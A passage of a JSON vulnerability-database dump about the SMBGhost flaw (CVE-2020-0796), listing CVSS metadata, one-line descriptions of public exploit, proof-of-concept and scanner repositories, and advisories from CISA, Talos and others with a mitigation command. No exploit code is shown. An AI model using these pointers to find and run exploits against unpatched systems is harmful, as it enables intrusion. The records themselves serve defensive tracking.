7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-25T13:39:58", "description": "# SMBGhost-LPE-Metasploit-Module\nThis is an implementation of th...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-19T20:38:11", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-07-25T13:36:10", "id": "FA0B4B9E-5D12-55F9-9E66-FA9CF9AF1B72", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:22:52", "description": "# SMBGhost\nSimple scanner for CVE-2020-0796 - SMBv3 RCE.\n\nThe sc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-11T15:21:27", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-07-27T07:11:36", "id": "BDCD16BE-ECED-5F2A-994A-FBF6539639ED", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-20T15:44:33", "description": "# CVE-2020-0796-CNA\n\n\u6839\u636e[danigargu](https://github.com/danigargu/...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-06T15:16:10", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-07-20T07:40:59", "id": "709F50E2-7719-5BDB-ABBF-7CF8A820C46F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-03T05:33:54", "description": "This is Raphael's tinkering around with the SMBGhost LPE.\n\nI sta...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-17T01:48:37", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-08-02T23:44:07", "id": "2C47C88A-DA77-535C-9BCD-4A89D8B02384", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-01T05:55:15", "description": "# CVE-2020-0796\nWorking Exploit PoC (CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-22T09:10:15", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-05-31T15:25:40", "id": "23687103-A800-5907-929B-B3A41D121F1B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-29T11:37:50", "description": "# SMBGhost (CVE-2020-0796) and SMBleed (CVE-2020-1206) Scanner\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-07-06T14:45:07", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1206", "CVE-2020-0796"], "modified": "2021-12-29T11:15:53", "id": "D7ADE5F6-D414-5DF2-AEC2-92FB32E6041F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-04T15:04:24", "description": "# CVE-2020-0796 Remote Code Execution POC\n\n(c) 2020 ZecOps, Inc....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-20T14:35:48", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1206"], "modified": "2022-04-04T13:58:48", "id": "5FB67B52-8BE9-5EE4-B573-CF49FD1579A5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:49:58", "description": "# GUI Check CVE-2020-0796\n\n#### \u52d8\u8bef\uff1a\n\u6b63\u786e\u7684CVE\u540d\u79f0\u662fCVE-2020-0796\uff0c\u800c\u4e0d\u662fCV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-14T07:59:28", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-0976"], "modified": "2021-12-05T20:44:03", "id": "C8967016-587F-5098-AD59-ED5BF752FD5A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-31T02:29:29", "description": "# Ladon Scanner For Python\n\n[![Author](https://img.shields.io/ba...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-11-19T16:51:39", "type": "githubexploit", "title": "Exploit for Vulnerability in Oracle Weblogic Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2894", "CVE-2020-0796"], "modified": "2022-03-31T01:03:48", "id": "387719E9-0938-5546-95DA-D88EC7E3FF13", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:18:47", "description": "# Contains Custom NSE scripts \n\n\n# CVE-2020-0796\nNSE script to d...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-11T17:51:29", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1350", "CVE-2021-21972", "CVE-2021-21973", "CVE-2021-34473"], "modified": "2022-03-23T17:15:09", "id": "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "myhack58": [{"lastseen": "2021-01-01T04:42:18", "description": "Recently, Qi'an letter of Threat Intelligence Center released Microsoft WindowsSMBv3 service remote code execution vulnerability announcements. Notice that 3 on 11 May, the foreign company released a recent Microsoft security patch design vulnerability summary, which includes a threat level is marked as Critical SMB service remote code execution vulnerability, the vulnerability number CVE-2020-0796, the vulnerability exists in the Windows SMBv3 file sharing and print services in. \nAccording to the Company Description, An attacker can exploit this vulnerability, the remote to send the special structure of malicious data, and without user authentication can lead to on the target system to execute malicious code, thereby acquiring the machine full control permissions. Odd Anxin Threat Intelligence Center the red rain team remind, the use of this vulnerability can be stably caused by the system crash, due to the vulnerability of the presence information has spread, and there are indications that the hacker groups are actively research vulnerabilities details Try Use, constitute a potential security threat. \nSupport the Protocol of the device including Windows 8, Windows 8.1, Windows 10, Windows Server 2012, and Windows Server 2016, but from Microsoft's announcement of view of the affected target is mainly Win10 system. It is worth noting that, according to market research firm NetMarketShare's latest data show that in Win10 system currently on the market accounted for 57. 39%, and with the Windows 7 operating system officially stop taking, this ratio also will continue to grow. Therefore, taking into account the related devices of the order of magnitude, the vulnerability of potential threats is large, and there is a wide range of Use May, for example, the Eternal Blue of the event, etc. \nVulnerability the basic situation is as follows: \n! [](/Article/UploadPic/2020-3/2020314211318678. png) \nCurrently, Microsoft has released the appropriate security patches, Qi'an the letter strongly recommends that users immediately install patches to protect against this vulnerability to cause the risk. Patch installation can access the following links: \nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796 \nSuch as temporarily not convenient to install the patch, Microsoft recommends executing the following command disables SMB 3.0 compression function: \nSet-ItemProperty-Path\"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\"DisableCompression-Type DWORD-Value 1-Force \n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-14T00:00:00", "title": "Odd security letter issued to Microsoft a high-risk vulnerability warning Win10 as the main effect of the target-vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-14T00:00:00", "id": "MYHACK58:62202097543", "href": "http://www.myhack58.com/Article/html/3/62/2020/97543.htm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2022-07-15T19:58:18", "description": "Discover how to protect your systems against SMB vulnerabilities and the latest critical Microsoft vulnerabilities released.", "cvss3": {}, "published": "2020-03-17T20:12:00", "type": "akamaiblog", "title": "How To Protect Your Systems Against Critical SMB Vulnerabilities (CVE-2020-0796)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-17T20:12:00", "id": "AKAMAIBLOG:BBE7670A93BC8AF70B2207E0CEF64EAA", "href": "https://www.akamai.com/blog/security/how-to-protect-your-systems-against-critical-smb-vulnerabilities-cve-2020-0796", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server or client.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-10T00:00:00", "type": "cisa_kev", "title": "Microsoft SMBv3 Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-02-10T00:00:00", "id": "CISA-KEV-CVE-2020-0796", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2020-03-17T19:53:43", "description": "By Jon Munshaw and Vitor Ventura. Update (March 12, 2020): Microsoft released an out-of-band patch for CVE-2020-0796, a code execution vulnerability SMB client and server for Windows. An unauthenticated attacker could exploit this vulnerability to execute remote code. Snort rules 53425 - 53428 protect against exploitation of CVE-2020-0796. Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/QDmutXTZ35E)", "cvss3": {}, "published": "2020-03-12T10:00:14", "type": "talosblog", "title": "Microsoft Patch Tuesday \u2014 March 2020: Vulnerability disclosures and Snort coverage", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T10:00:14", "id": "TALOSBLOG:136C0DF46D16B7D21DD712BDD956BC41", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/QDmutXTZ35E/microsoft-patch-tuesday-march-2020.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa": [{"lastseen": "2021-02-24T18:06:35", "description": "Microsoft has released out-of-band security updates to address a remote code execution vulnerability (CVE-2020-0796) in Microsoft Server Message Block 3.1.1 (SMBv3). A remote attacker could exploit this vulnerability to take control of an affected system. \n \nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following resources and apply the necessary updates or workarounds. \n\u2022 Microsoft Security Guidance for [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) \n\u2022 Microsoft Advisory [ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005>) \n\u2022 CERT Coordination Center\u2019s Vulnerability Note [VU#872016](<https://www.kb.cert.org/vuls/id/872016/>)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/03/12/microsoft-releases-out-band-security-updates-smb-rce-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-12T00:00:00", "type": "cisa", "title": "Microsoft Releases Out-of-Band Security Updates for SMB RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T00:00:00", "id": "CISA:2584F925B4D0F34C7EBE8E9D34FC72C7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/03/12/microsoft-releases-out-band-security-updates-smb-rce-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:52", "description": "Microsoft has released a security advisory to address a remote code execution vulnerability (CVE-2020-0796) in Microsoft Server Message Block 3.1.1 (SMBv3). A remote attacker can exploit this vulnerability to take control of an affected system. SMB is a network file-sharing protocol that allows client machines to access files on servers.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft Advisory [ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005>) and the CERT Coordination Center\u2019s Vulnerability Note [VU#872016](<https://www.kb.cert.org/vuls/id/872016/>) and apply the the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/03/11/microsoft-server-message-block-rce-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-11T00:00:00", "type": "cisa", "title": "Microsoft Server Message Block RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T00:00:00", "id": "CISA:50FD88CEEFDE175A266C8EB09AC92D7D", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/03/11/microsoft-server-message-block-rce-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:42", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) is aware of publicly available and functional proof-of-concept (PoC) code that exploits CVE-2020-0796 in unpatched systems. Although Microsoft disclosed and provided updates for this vulnerability in March 2020, malicious cyber actors are targeting unpatched systems with the new PoC, according to recent open-source reports. CISA strongly recommends using a firewall to block SMB ports from the internet and to apply patches to critical- and high-severity vulnerabilities as soon as possible. \n\nCISA also encourages users and administrators to review the following resources and apply the necessary updates or workarounds.\n\n * Microsoft Security Guidance for [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>)\n * Microsoft Advisory [ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005>)\n * CERT Coordination Center\u2019s Vulnerability Note [VU#872016](<https://www.kb.cert.org/vuls/id/872016/>)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-06-05T00:00:00", "type": "cisa", "title": "Unpatched Microsoft Systems Vulnerable to CVE-2020-0796 ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 